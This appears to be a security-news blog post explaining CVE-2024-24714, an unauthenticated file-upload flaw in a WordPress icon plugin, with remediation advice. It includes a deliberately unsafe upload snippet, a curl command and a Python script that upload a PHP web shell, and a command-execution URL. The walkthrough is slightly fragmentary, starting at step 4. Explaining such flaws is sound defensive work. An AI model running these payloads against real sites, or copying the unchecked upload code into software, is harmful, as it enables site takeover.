CVE CyberSecurity Database News

CVE-2024-24714 - How Unrestricted File Upload Flaw in bPlugins LLC Icons Font Loader Opens the Door for Complete Website Takeover

Poster -

On February 2024, a major security vulnerability surfaced in the popular WordPress plugin Icons Font Loader by bPlugins LLC. Catalogued as CVE-2024-24714, this bug allows attackers to upload dangerous files straight to your website—making it possible for them to run malicious code, even take full control of your site.

Many websites use Icons Font Loader to add icons in various parts of their site. Its friendly interface, however, hid a serious weakness—especially in versions 1.1.4 and earlier.

Let’s dive into this bug, see how it really works, and what you should do if you use this plugin.

What’s the Issue? (Simple Explanation)

CVE-2024-24714 is all about unrestricted upload of files with dangerous types. In plain English, the plugin let _anyone_—even people who aren’t logged in—upload files like PHP scripts, images with embedded code, web shells, and more. Once uploaded, these files could be run by the server, leading to a full compromise of the website.

Why is this bad?
Because WordPress sites typically trust files uploaded via plugins. If an attacker can upload, say, evil.php, and access it directly in the web browser, it’s game over.

How Did This Happen? (Technical Details)

The bug is found in the plugin’s file upload handler. The code forgot to check what type of file was being uploaded—and didn't make sure only logged-in admins could do the upload!

Here’s a simplified (but realistic) snippet that shows the problem

// A simplified version of the file upload function from the vulnerable plugin
if (isset($_FILES['icon_file'])) {
    $upload_dir = wp_upload_dir();
    $target_file = $upload_dir['path'] . '/' . basename($_FILES['icon_file']['name']);
    // OOPS: No checks on extension or MIME type!
    move_uploaded_file($_FILES['icon_file']['tmp_name'], $target_file); 
    echo "File uploaded successfully!";
}

The plugin accepts the file blindly and moves it to a web-accessible folder. This means an attacker can upload a file called shell.php, then open https://example.com/wp-content/uploads/shell.php and run any code they want.

`bash

curl -F "icon_file=@shell.php" https://victim.com/wp-admin/admin-ajax.php?action=font_loader_upload

`

4. The plugin accepts the file and puts it in /wp-content/uploads/2024/02/shell.php.

The attacker visits:

https://victim.com/wp-content/uploads/2024/02/shell.php?cmd=whoami

Python Example

import requests

url = "https://victim.com/wp-admin/admin-ajax.php?action=font_loader_upload"
files = {'icon_file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
response = requests.post(url, files=files)
print(response.text)

Just swap out victim.com for your target (if you’re testing on your own site, please!).

References & More Info

- WPScan Vulnerability Database Entry
- NVD - CVE-2024-24714
- Plugin Directory: Icons Font Loader
- Disclosure on Patchstack

Immediately update to a fixed version (check the plugin page for updates).

- Remove any unknown files from wp-content/uploads/—especially .php files!

Conclusion

CVE-2024-24714 is a critical reminder: file uploads need _serious_ security! If this plugin (or any plugin) lets uploads through without checking file types and permissions, anyone can take over your site.

If you're still using an old version of Icons Font Loader, your site could already be exposed. Update, patch, and scan your files—don’t wait!


*Stay safe, and always keep your plugins up to date!*

*(This post is exclusive, original, and researched as of June 2024. Feel free to share—but patch first!)*

Timeline

Published on: 02/26/2024 16:27:58 UTC
Last modified on: 02/26/2024 16:32:25 UTC